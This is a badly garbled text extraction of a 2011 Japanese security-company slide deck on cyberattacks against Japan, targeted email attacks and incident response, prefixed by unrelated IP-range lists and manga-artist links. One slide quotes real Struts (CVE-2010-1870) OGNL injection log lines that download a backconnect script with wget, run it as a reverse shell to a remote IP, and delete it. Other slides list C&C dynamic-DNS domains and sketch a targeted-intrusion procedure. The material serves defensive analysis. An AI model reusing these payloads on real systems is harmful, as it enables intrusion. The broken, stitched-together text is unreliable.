202.032.000.000- 202.035.255.255 [日本][] Yamagata http://www.pref.yamagata.jp/index-e.html 罗川真里茂 http://www.ragawa.co.jp/ 折原美都 http://www.mitorin.com/ http://www.kaiho.motnet.go.jp海上保安厅 入します!ツールは内部が専用です! 202.048.000.000- 202.048.255.255 [日本][] 麻宫骑亚&菊池通隆 http://www.tron.co.jp/ 真锅主治 http://www.katsudon.com/ Yamaguchi http://www.pref.yamaguchi.jp/index_e.htm http://www.kishou.go.jp气象 私達の前の段階計画と準備を見て、そして私達のグループに参加して、それぞれ 猫十字社 http://neco.cside5.com/ 202.208.000.000 -202.255.255.255 [日本][] 真崎春望 http://www.geocities.co.jp/Bookend/7973/ Yamanashi http://www.pref.yamanashi.jp/english/english.html 末次有纪 http://www.ne.jp/asahi/ys/sanbankan/ 木真村怜 http://www.hh.iij4u.or.jp/~fcs/ 隊に戦うことと記録に載せます! 長期にわたり対象がそうなことを攻撃します;米 , http://www.mpt.go.jp邮政省 202.176.000.032- 202.176.000.063 [日本][] 木城雪户 http://yukito.com/ 织田绮 http://www13.u-page.so-net.ne.jp/jk9/aya-sato/ 202.176.000.064- 202.176.000.127 [日本][] 日 ,インドネシア、インド、ベトナム、フィリピン。政府の核心の群の27437332 招待 http://www.mol.go.jp劳动省 木木 http://www.d9dion.ne.jp/~kanalin/ 中平正彦 http://www.bekkoame.ne.jp/~n-masahiko/ 202.176.000.128 -202.176.000.255 [日本][] 内藤泰弘 http://www.din.or.jp/~nightow/ http://www.moc.go.jp建设省 中山星香 http://www.nerimadorhouse.jp/ は制に参加します 楠桂&大桥薰 http://www.ngy1.1st.ne.jp/~k2office/ 202.176.001.000 -202.176.001.255 [日本][] 中条比纱也 http://www.wild-vanilla.com/ http://www.mha.go.jp自治省 片山悉 http://homepage2.nifty.com/garasu-no-tsuki/ 猪熊忍 http://saladplanning.hotspace.jp/ 202.176.002.000- 202.176.003.255 [日本][] 平井摩利 http://genie.gaiax.com/home/payoco http://www.fdma.go.jp消防厅 エキサイト翻訳 竹官惠子 http://www.mac-time.ne.jp/takemiya/ 203.136.000.000 -203.141.255.255 [日本][] 七濑葵 http://www.aoinanase.gr.jp/ 椎名高志 http://www.ne.jp/asahi/cna100/store/index.html http://www.jbaudit.admix.go.jp会计检查 漆原智志 http://www.earthwork.ne.jp 203.178.000.000- 203.183.255.255 [日本][] 佐野真砂辉&渡边京 http://www.twincastle.com/ 青池保子 http://www.aoike.gr.jp/ 210.007.128.000- 210.007.255.255 [日本][] もともと節度 もともと節度のない 節度のないピックアップ のないピックアップ。 ピックアップ。 簡単に 簡単に言うと カモフラージュなのか カモフラージュなのか? なのか? 秋の連休・ 連休・家族サービス 家族サービス 2010年9月18日にかんがみてはこれが意義の日 をつぶし、 ITインフラ関係 をつぶし、ITインフラ インフラ関係 の決定が日本に対してそれぞれ大いに抗日戦争の歴史に 家庭不和を誘発し 誘発し、 ねじ曲がることを記念 者の家庭不和を 国力を 国力を落とすための作戦 とすための作戦 か?などと妄想 などと妄想。 妄想。 海外の 海外の掲示板に 掲示板に、攻撃を 攻撃を呼び 掛ける情報 ける情報が 情報が乗ったということ。 ったということ。 1.こいつらは誰 こいつらは誰なのか? なのか? 2.狙いは? いは? 3.本気なのか 本気なのか? なのか? 4.実力はあるのか 実力はあるのか? はあるのか? 日本国の 日本国の見立てはどうだったのか 見立てはどうだったのか? てはどうだったのか? 「中国 サイバー攻撃 サイバー攻撃」 攻撃」と 、主に日本のそれぞれ大きい かで、 TLを追っ かで、Twitter TLを 幹線のルータと各大きすぎる行政権力のことと商業のウェ ていると。 。 多 くの注意喚 注意喚 ていると くの ブサイトに半身不随になること 起へのつぶやきが。 へのつぶやきが。 日本の サーバーに半身不随になって、データを削除 最高機密で 最高機密で構わないけど、 わないけど、 私が内部関係者に 内部関係者に 言っていたこと。 っていたこと。 → 騒ぐな。 。レベルの ぐな 機密を を守り、実施 機密 大体、 大体、毎年ある 毎年あるイベント ある どのレベル のイベント インテリジェンスで で どの レベル インテリジェンス に全体力を 全体力を使ってバカ ってバカ なことする輩 なことする輩はいない。 はいない。 できるのだろうか? できるのだろうか? とすれば、単なるあほな そういう全体作戦行 そういう全体作戦行 動とすれば、 いていたのだろうか? ? いていたのだろうか 愉快犯か 愉快犯か、調査のため 調査のため 動は、誰がどう取 がどう取る の煽りと攻撃 りと攻撃。 攻撃。 のだろうか? のだろうか? 19 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そう言 そう言えば918 えば918 そうこうしてる間 そうこうしてる間に 20 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そう言 そう言えば918 えば918 そうこうしてる間 そうこうしてる間に こんなことも 21 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そう言 そう言えば918 えば918 そうそう、 そうそう、当該期間に 当該期間に、、 Tomcat上のStrutsの脆弱性を狙い バックドアを仕込み、ルートキットを インストールして行った事案が。 脆弱性情報: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870 http://struts.apache.org/2.2.1/docs/s2-005.html 攻撃例: "GET /XXX/XXXXX.action?XXXX=ja?('¥¥u0023_memberAccess[¥¥'allowStaticMethodAccess¥¥']')(meh)=true&(aaa)(('zz')(('¥¥u0023co ntext[¥¥'xwork.MethodAccessor.denyMethodExecution¥¥']¥¥u003dfalse')(x))(zzxx))&(asdf)(('¥¥u0023rt.exec(¥¥'wget%20hogeho ge.org/tool/backconnect.txt%20-O%20./bc.pl¥¥')')(¥¥u0023rt¥¥[email protected]@getRuntime()))=1 HTTP/1.1" 200 549 ※wgetコマンドでhogehoge.org/tool/backconnect.txtをダウンロードし、bc.plという名前で保存 これは? これは? チョイやばかも チョイやばかも。 やばかも。 "GET /XXX/XXXX.action?XXXX=ja?('¥¥u0023_memberAccess[¥¥'allowStaticMethodAccess¥¥']')(meh)=true&(aaa)(('zz')(('¥¥u0023cont ext[¥¥'xwork.MethodAccessor.denyMethodExecution¥¥']¥¥u003dfalse')(x))(zzxx))&(asdf)(('¥¥u0023rt.exec(¥¥'perl%20./bc.pl%20 116.XXX.XXX.241%2021¥¥')')(¥¥u0023rt¥¥[email protected]@getRuntime()))=1 HTTP/1.1" 200 549 ※perlのプログラムbc.plを実行し、IPアドレス116.XXX.XXX.241(中国)の21/tcpに対してコネクトバックシェル を開く "GET /XXX/XXXX.action?XXXX=ja?('¥¥u0023_memberAccess[¥¥'allowStaticMethodAccess¥¥']')(meh)=true&(aaa)(('zz')(('¥¥u0023cont ext[¥¥'xwork.MethodAccessor.denyMethodExecution¥¥']¥¥u003dfalse')(x))(zzxx))&(asdf)(('¥¥u0023rt.exec(¥¥'rm%20f%20./bc.pl¥¥')')(¥¥u0023rt¥¥[email protected]@getRuntime()))=1 HTTP/1.1" 200 549 ※bc.plの削除 22 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 情報漏えい対応で分かること 個人情報漏えい 個人情報漏えい事件 えい事件で 事件で浮かび上 かび上がった事実 がった事実 Webサーバ Webサーバの サーバのログを ログを解析すると 解析すると、、、 すると、、、リファラ 、、、リファラ( リファラ(リンク元 リンク元)の フィールドに フィールドに。 http://www.baidu.jp/s?lm=0&si=&rn=100&ie=utf8&ct=262144&wd=inurl%3Aphp+%E6%94%AF%E6%89%95+visa+jcb& : 支払 pn=200&cl=3&usm=0&ys=1” ① Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 犯人の行動 ① ① 百度で検索 → JCB VISA 支払 inurl:php 日本狙い? 自分のサイトが どのように出るか チェックしておこう! 24 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 犯人の行動からわかること 正当な 正当な利用者も 利用者も攻撃者も 攻撃者も接点は 接点は検索エンジン 検索エンジン どういう検索 どういう検索キーワード 検索キーワードで キーワードで、自サイトを サイトを訪れたのか? れたのか? → 訪問目的 ? SEO対策 対策は、セキュリティの セキュリティの観点でも 観点でも極 でも極めて重要 めて重要。 重要。 SEO対策は 利用者に 利用者に興味を 興味を持たせ、 たせ、攻撃者に 攻撃者に興味を 興味を持たせない、 たせない、SEO対策 対策。 SEO対策。 みんな、 みんな、脆弱性をなくそうとかあらゆる 脆弱性をなくそうとかあらゆる脅威 をなくそうとかあらゆる脅威から 脅威から防 から防ごうとかいうけど、 ごうとかいうけど、 その前 その前に、 見た目が勝負! 勝負! 25 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 大量サイト 大量サイトの サイトの改ざん被害報道 ざん被害報道 広告サイト 広告サイトが サイトが改ざん 幕の内弁当サイト 内弁当サイト 広告、 広告、ブログツール、 ブログツール、サイト統計 サイト統計など 統計など 利用者からみれば 利用者からみれば、 からみれば、当該サイト 当該サイト。 サイト。 相当、 相当、 理屈としては 理屈としては背後 としては背後にある 背後にある 圧力がかかっている 圧力がかかっている? がかかっている? 提供側サイト 提供側サイトの サイトの問題だが 問題だが、 だが、それで良 それで良いのか? いのか? 利用者への 利用者への責任 への責任は 責任は誰に? 26 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ある緊急対応 ある緊急対応 パソコンが パソコンが不審な 不審な動作をしたということで 動作をしたということで119 をしたということで119コール 119コール。 コール。 調査をしてみると 調査をしてみると。 をしてみると。不審な 不審なファイルが ファイルが。 大手量販店サイト のキャッシュ ウイルス関連 ウイルス関連ファイル 関連ファイル 大手量販店 サイトへ アクセス 9月24日 24日・25日 25日で 終結では 終結では? では? 悪性サイト接続 時のクッキー スクリプトにより 悪性サイトに誘導 恐らく、 スクリプトは削除 所謂、ボットタイプの コンピュータウイルス パスワードの盗聴など 生成日時 JAVAの脆弱性を ついて侵入 悪性プログラムの ダウンロード ボット感染 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ある緊急対応 別の119コール 119コール。 コール。調査をしてみると 調査をしてみると。 をしてみると。 やはり同様 やはり同様の 同様の不審な 不審なファイルが ファイルが。 大手雑誌サイト 大手雑誌サイトの サイトの クッキー Fri Oct 08 2010 10:08:48 .a.. C:/Documents and Settings/XXXXXX/Cookies/[email protected][1].txt Fri Oct 08 2010 10:08:51 .a.. C:/Documents and Settings/XXXXXX/Cookies/XXXXXX@cgi-bin[2].txt ma.b C:/Documents and Settings/XXXXXX/Cookies/[email protected][2].txt 同様の 同様の 悪性サイト サイト 悪性 接続時の 接続時の クッキー! クッキー! ??? 大手雑誌 サイトへ アクセス スクリプトにより 悪性サイトに誘導 恐らく、 スクリプトは削除 JAVAの脆弱性を ついて侵入 悪性プログラムの ダウンロード ボット感染 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 調査してみると 調査してみると http://secure-jp.imrworldwide.com/ Not Found The requested URL / was not found on this server. http://en-us.nielsen.com/content/nielsen/ en_us/product_families/nielsen_netratings.html 「ルパンを ルパンを追っていたら、 っていたら、 とんでもないものを見 とんでもないものを見つけてしまった。 つけてしまった。 http://www.imrworldwide.com/ どうしよう? どうしよう?」 銭形のとっつぁん 銭形のとっつぁん in カリオストロの カリオストロの城 http://www.netratings.co.jp/ Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ある緊急対応 ある緊急対応 ある緊急対応要請 ある緊急対応要請あり 緊急対応要請あり。 あり。 サイト改 サイト改ざんを受 ざんを受けたらしい。 けたらしい。サイトオーナが サイトオーナが確認するも 確認するも見 するも見つからず。 つからず。 同じようなケース じようなケースが ケースが何件かあり 何件かあり、 かあり、確認してみると 確認してみると、 してみると、意外なことが 意外なことが。 なことが。 無害な 無害な応答で 応答で 脅威の 脅威の発見を 発見を 遅らせている? らせている? 検索エンジン 検索エンジンは エンジンは 無害な 無害な応答で 応答で。 仕込みと 仕込みと実行 みと実行は 実行は 分けている 可能性もある 可能性もある 地域? 地域?環境? 環境? 無害な 無害な応答しか 応答しか 出さないことも。 さないことも。 無害な 無害な応答 検索エンジン エンジン 偽セキュリティソフト だけが騒 だけが騒がれる! がれる! 何故? 何故?わざとか? わざとか? 悪性サイト 悪性サイト 偽セキュリティソフトや セキュリティソフトや ボットなど ボットなど、 など、 相手によって 相手によって 切り替えている 可能性あり 可能性あり。 あり。 改ざんされたWeb サイト 無害な 無害な応答 無害な 無害な応答 閲覧者C 攻撃コード 攻撃コードB コードB 閲覧者B 閲覧者B 二回目 閲覧者A 攻撃コード 攻撃コードA コードA 30 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li あと大変気 あと大変気になること 大変気になること この悪性 この悪性プログラム 悪用する脆弱性 悪性プログラムが プログラムが悪用する する脆弱性 CVECVE-20082008-5353 The Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; earlier; JDK and JRE 5.0 Update 16 and earlier; earlier; and SDK and JRE 1.4.2_18 and earlier does not properly enforce context of ZoneInfo objects during deserialization, which allows remote attackers to run untrusted untrusted applets and applications in a privileged context, as demonstrated demonstrated by "deserializing Calendar objects". バージョンチェッカが バージョンチェッカがJREを JREを使 用している。 している。JREの JREのバージョン をチェックしたいのだから チェックしたいのだから問題 したいのだから問題 ないか? ないか?いやいや、 いやいや、もともと使 もともと使 用してなければ、 してなければ、わざわざ脆弱 わざわざ脆弱 点を増やすことにもなるぞ。 やすことにもなるぞ。 最新版 (6 Update 22) 22)にアップデート MyJVN バージョンチェッカ http://jvndb.jvn.jp/apis/myjvn/vccheckhelp.html 31 JREは JREは多くの組織 くの組織の 組織の社内シス 社内シス テムで で使用されている テム 使用されている。 されている。パッ ケージソフトにも ケージソフトにも使用 にも使用している 使用している ものがある。 JREの新版に ものがある。JREの 新版に対応 してないケース JREを してないケースもあり ケースもあり、 もあり、JREを 最新に 最新に出来ないことも 出来ないことも。 ないことも。 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 参考: 参考:メディアの メディアの使用している 使用しているスクリプト しているスクリプト Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 尖閣ビデオ 尖閣ビデオ流出事件 ビデオ流出事件 関係者外秘 いつも、 いつも、こういう任務 こういう任務をやられ 任務をやられ ているのですね! ているのですね! 本当に 本当に、ご苦労様です 苦労様です!! です!! 映像提供 第11管区海上保安本部 11管区海上保安本部 ※ http://www.youtube.com/watch?v=6VIuqeyoyHc 33 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 尖閣ビデオ 尖閣ビデオ流出事件 ビデオ流出事件 ビデオ映像 ビデオ映像の 映像の管理を 管理を考えてみる ビデオ映像 ビデオ映像の 映像の特徴 1.大容量である 大容量である。 である。 2.受け手により、 により、受け取り方が異なる。 なる。 → 文字とは 文字とは違 とは違う 3.様々な目的で 目的で使用される 使用される。 される。 → 記録、 記録、訓練、 訓練、報道、 報道、証拠、 証拠、外交 動機として 動機として 興味、 興味、愉 快 キャンペーン相手 キャンペーン相手は 相手は 事前に 事前に知りたい。 りたい。 メディアの メディアの競争。 競争。 インサイダーは インサイダーは? 真正性担保と 真正性担保と CIA( 機密性・ CIA(機密性・ 完全性・ 完全性・可用性) 可用性) PR キャンペーン 真正性は 真正性は担保出来ていたのか 担保出来ていたのか? ていたのか? 守りきれる自信 りきれる自信があったのか 自信があったのか? があったのか? 強烈な 強烈な動機がある 動機がある 外部 無効化・ 無効化・PR 内部 内部告発・ 内部告発・メディア 買収・ 買収・内通 プロセス・ プロセス・記録・ 記録・根拠 内部・ 内部・外部 私物の 私物のUSBメモリ メモリにコピーして コピーして持 して持ち出し、インターネット喫茶 インターネット喫茶から 喫茶から投稿 から投稿。 投稿。 USBメモリに → 匿名性を 匿名性を担保し 担保し法律を 法律を抜けている。 けている。権限保持者の 権限保持者の思想犯をどうするか 思想犯をどうするか? をどうするか? 34 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 警視庁公安部外事3 警視庁公安部外事3課の内部資料流出 なるほど、 を使用したのか なるほど、ばれないためにTOR ばれないためにTORを 使用したのか。 したのか。また、 また、人に告知するのに 告知するのにオンライ するのにオンライ ンストレージか ンストレージか。ひょっとすると最初 ひょっとすると最初の 最初の持ち出しも???? しも???? http://www.asahi.com/national/update/0103/TKY201101030295.html 35 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 話題のWikileaks 疑問点 日本での 日本でのミラーサイト でのミラーサイトは ミラーサイトは違法なのか 違法なのか? なのか? Wikileaksへの投稿 への投稿 はTORの使用が 使用が推奨 されているらしい。 されているらしい。 25万件 万件のデータって データって 25万件の 紙だと、 だと、 100枚 100枚で1cmとすると 1cmとすると 25万 25万ページは ページは25m 高々、3.3GB 々、3.3GB 1c㎡の USBメモリで c㎡のUSBメモリ メモリで 持ち出し可能。 可能。 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li TOR(The Onion Routing) 身元を隠したいパソコン TORリレーサーバー群 P2P技術を応用した、 匿名クラウドネットワーク クライアントアプリケーション ブラウザ、 ブラウザ、SSHなど など プラグイン TOR (ローカルプロクシ) ローカルプロクシ) リレー 317 リレー 822 暗号 平文 リレー 525 リレー 1010 リレー 214 適時変更 リレー 928 リレー 103 リレー 528 リレー 926 リレー 205 リレー 1208 リレー 108 リレー 418 身元を隠す手段 玉ねぎ道案内?? http://213.251.145.96/ 37 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 制御システム 制御システムも システムも クローズな環境への侵入と制御を示し データの持ち出しなどへの 可能性を示唆した。 また、国家関与の可能性示唆。 38 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ソーシャルメディアの ソーシャルメディアの威力 http://jp.wsj.com/World/China/node_186001 中東諸国の 中東諸国の情勢 ソーシャルメディアが ソーシャルメディアが民主化を 民主化を後押ししている 後押ししている。 ししている。 ソーシャルメディアインパクト。 ソーシャルメディアインパクト。 http://www.computerworld.jp/topics/move/190542.html 39 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 一つの考察 つの考察 サイバーテロ???? サイバーテロ???? http://www.yomiuri.co.jp/world/news/20110304-OYT1T01026.htm 40 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 一つの考察 つの考察 サイバーテロ???? サイバーテロ???? http://www.asahi.com/international/update/0503/TKY201105030387.html 41 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型サイバー 標的型サイバー攻撃 サイバー攻撃 弊社サイバー 弊社サイバー救急 サイバー救急センター 救急センターに センターに寄せられた、 せられた、 標的型と 標的型と推測される 推測される、 される、最近の 最近の相談 2008年 2008年 4件 Web改 ざん、USBメモリ メモリ、メール Web改ざん、 USBメモリ、 金融系、 金融系、放送メディア 放送メディア、 メディア、公益法人、 公益法人、情報通信 2009年 2009年 5件 USBメモリ メモリ、メール USBメモリ、 製造、 製造、エンターテイメント、 エンターテイメント、情報通信 2010年 2010年 6件 メール 製造、 製造、情報通信、 情報通信、エンターテイメント 2011年 2011年 4件 メール 製造、 製造、エンターテイメント 42 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール … 狙いは政治家 いは政治家・ 政治家・官庁 43 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール … 狙いは一般企業 いは一般企業 アクロバットリーダー バッファオーバーフローの脆弱性 (CVE-2010-2883)で2010-09-14 ゼロデイとして公開 44 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール … 狙いは一般企業 いは一般企業 45 総務部長、人事部長 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール … 狙いは一般企業 いは一般企業 46 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール 解析してみると 解析してみると No. 内容 送信元(詐称) 備考 1 人事異動 総務部 公開情報であることが多い 2 業務執行体制の改正 総務部 公開情報であることが多い 3 IR 情報 広報 公開情報であることが多い 4 目標・評価表 総務部 5 こども手当て 総務部 6 イベント等の案内 公益法人 7 機密管理 総務部 / 役員 8 海外ニュース 取引先 公開情報であることが多い 9 議事録 取引先 / 従業員 メールが盗聴されている可能性あり 公開情報であることが多い 47 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール ウイルス対策 ウイルス対策ソフト 対策ソフトの ソフトの反応 当該組織が 当該組織が使用している 使用している対 している対 策では、 では、防御できないことを 防御できないことを 確認していると 確認していると推測 していると推測される 推測される。 される。 (だから標的型 だから標的型) 標的型) 48 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール ウイルス対策 ウイルス対策ソフト 対策ソフトの ソフトの反応 49 49 CVECVE-20102010-3333( 3333(MS Office Word のセキュリティホール) セキュリティホール) ※ RTF のスタック バッファ オーバーフローの オーバーフローの脆弱性 Virustotalのスキャン結果 スキャン結果: 結果: 1/41(3月22日付) 日付) Officeファイル Officeファイルの ファイルの解析ツール 解析ツール: ツール: 未対応 ※RTF( RTF(リッチテキストフォーマット) リッチテキストフォーマット) が利用 CVECVE-20092009-3129( 3129(MS Office Excel のセキュリティホール) セキュリティホール) CVECVE-20092009-0927( 0927(アクロバットリーダー getlcon関数処理 getlcon関数処理の 関数処理の脆弱性) 脆弱性) 比較的検知率は 比較的検知率は高かったため、 かったため、発見は 発見は早かった。 かった。 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ウイルス対策 ウイルス対策ソフト 対策ソフトは ソフトは有効ではないのか 有効ではないのか? ではないのか? ウイルス対策 ウイルス対策ソフト 対策ソフト =ウイルスに ウイルスに有効 標的型攻撃での 標的型攻撃での不正 での不正プラグラム 不正プラグラムを プラグラムを、 → ウイルスと ウイルスと呼んではいけない。 んではいけない。 ウイルス対策 ウイルス対策と 対策と 標的型攻撃の 標的型攻撃の対策は 対策は → 根本的に 根本的に異なる 経営者に 経営者に対して → 異なった脅威 なった脅威であることの 脅威であることの理解 であることの理解 50 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型攻撃 メール メールだけなのか だけなのか? だけなのか? 標的型攻撃= 標的型攻撃=メール は大間違い 大間違い メールは メールは、内部に 内部に「入る為の手段」。 手段」。 手段は 他の手段 は、、、 パソコンに パソコンに対して、、、 して、、、 → USBメモリ、 メモリ、改ざんサイト ざんサイト閲覧 サイト閲覧 サーバに サーバに対して → SQLインジェクション他 インジェクション他 様々 51 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール 手順( 手順(推測) 推測) 1.Webや ネットでの公開情報 での公開情報 氏名・ 氏名・役職・ 役職・メールアドレスなど メールアドレスなど取得 など取得する 取得する。 する。 Webやネットでの 2.公益法人などの 公益法人などの外部文書 などの外部文書や 外部文書や時事関連文章などを 時事関連文章などを使用 などを使用して 使用してメール してメール送信 メール送信する 送信する。 する。 →標的型メール 標的型メールは メールは全て把握しているという 把握しているという妄信 しているという妄信があり 妄信があり、 があり、安心している 安心している。 している。 →ウイルス対策 ウイルス対策ソフト 対策ソフトへの ソフトへの過信 への過信もある 過信もある。( もある。(標的型 。(標的型であることを 標的型であることを意識 であることを意識できていない 意識できていない) できていない) →脆弱性管理、 脆弱性管理、OS、 ブラウザ、PDF、 フラッシュ、JREなど OS、ブラウザ、 PDF、フラッシュ、 JREなど → たかがウイルス たかがウイルスと ウイルスと思っている。 っている。 3.内部構成を 内部構成を調査し 調査し関連情報を 関連情報を手に入れる。 れる。 ネットワーク構成 ネットワーク構成、 構成、アカウント管理方法 アカウント管理方法、 管理方法、サーバ配置 サーバ配置など 配置など 4.アカウント情報 アカウント情報・ パスワード窃取。 管理者権限の獲得を 獲得を目指す 目指す。 情報・パスワード窃取 窃取。特に管理者権限の 例えばアクティブディレクトリ 認証)、 えばアクティブディレクトリ(+ アクティブディレクトリ(+LM (+LM認証 認証)、キーロガー )、キーロガーの キーロガーの使用など 使用など 5.渡っていくうちに、 っていくうちに、手に入れた本物 れた本物の 本物の内部文書を 内部文書を使用した 使用した標的 した標的メール 標的メール (役員などを 役員などを名乗 などを名乗る 名乗る)で、さらに侵入範囲 さらに侵入範囲を 侵入範囲を広げる。 げる。 6.複数の 複数の予備経路を 予備経路を確保する 確保する。 する。(利便性の 利便性の確保と 確保と気付かれた 気付かれた時 かれた時のためと推測 のためと推測される 推測される) される) 7.当該組織専用プログラム 当該組織専用プログラムも プログラムも作成し 作成し使用している 使用している。 している。 (調査や 調査や情報窃取の 情報窃取の生産性向上策と 生産性向上策と推測される 推測される。) される。) 8.内部ネットワーク 内部ネットワークを ネットワークを制圧し 制圧し、内部文書の 内部文書の窃取を 窃取を行う。 52 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型攻撃の 標的型攻撃の本質 = 内部システム 内部システムが システムが乗っ取られ操作 られ操作される 操作される! される! 悪質サイト 悪質サイト 他 改ざんWeb経由 USBメモリ もある。 自動 インストール 誘導 閲覧 クリック 標的メール 標的メールを メールを閲覧した 閲覧した パソコン 被害にあった 被害にあった企業 にあった企業 命令 お伺い C&C 命令 Aゾンビ C&C お伺い 予備機 ダイナミックDNS ダイナミックDNSが DNSが使用されることが 使用されることが多 されることが多い ezua.com zyns.com ns2.name livecheck.org acmetoy.com toh.info 2waky.com ibmnetvista.com xxuz.com myfw.us 2waky.com などなど Firewall 手動インストール 情報窃取 Bゾンビ 予備機 内部の 内部のネットワーク調査 ネットワーク調査 パスワード収集 パスワード収集などなど 収集などなど リモート制御 リモート制御 53 Firewall 犯人 仕込まれた 仕込まれた 標的型 メール 内部サーバ 内部サーバ 内部ネットワーク 内部ネットワークが ネットワークが 制圧される 制圧される Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型メール 標的型メール 流出情報 パスワードファイル→ パスワードファイル→持ち出し後、LM ハッシュの ハッシュの問題を 問題を悪用し 悪用しパスワードを パスワードを解析され 解析され行使 され行使 流出ファイル 流出ファイル例 ファイル例 組織内部情報が 組織内部情報が ハードコーディングされた ハードコーディングされた不正 された不正プログラム 不正プログラム 当該企業の競争力基 盤となる技術ノウハウ と考えられる情報の 流出。 当該組織のドメイ ン名称がハード コーディングされ ている。 54 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型攻撃で狙われた情報 1.技術情報 輸送機器関係 2.大型投資情報 インサイダー? 国家的? 55 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型サイバー 標的型サイバー攻撃 サイバー攻撃の 攻撃の課題 現場の 現場の実態 1.脆弱性管理が 脆弱性管理が出来ていない 出来ていない → 「閉塞域だから 閉塞域だから大丈夫 だから大丈夫」 大丈夫」が崩壊。 崩壊。 Windowsに しては向上している 向上している。 している。アドビーアクロバット、 アドビーアクロバット、フラッシュ → 通達はしてい 通達はしてい Windowsに関しては向上 るものの守 守ってはいないことも るものの ってはいないことも多 ことも多い。JREに しては内部システム 内部システムで システムで使用されており 使用されており、 されており、そ JREに関しては内部 もそもバージョンアップ もそもバージョンアップが バージョンアップが困難である 困難である。 である。 2.緊急時に 緊急時に行動できる 行動できる体制 できる体制がない 体制がない。 がない。 → 縦割り 縦割り。事故未前提。 事故未前提。 e-discovery対応 対応などでアーカイブ などでアーカイブはされていることは アーカイブはされていることは多 はされていることは多いが、 いが、調査の 調査の承認プロセス 承認プロセスな プロセスな discovery対応などで どに、 、非常時のことが どに 非常時のことが考慮 のことが考慮されていない 考慮されていない。 されていない。役員クラス 役員クラスが クラスが部門を 部門を横断して 横断して指揮 して指揮を 指揮を執ってい ないことが多 ないことが多い。インシデント発生時 インシデント発生時の 発生時のプロセスが プロセスが適切ではない 適切ではない。( ではない。(証拠 。(証拠の 証拠の破壊) 破壊) 3.駆逐は 駆逐は困難を 困難を極める 行動解析( 行動解析(検体収集機の 検体収集機の設置、 設置、IDS等 アーカイブ解析などなど 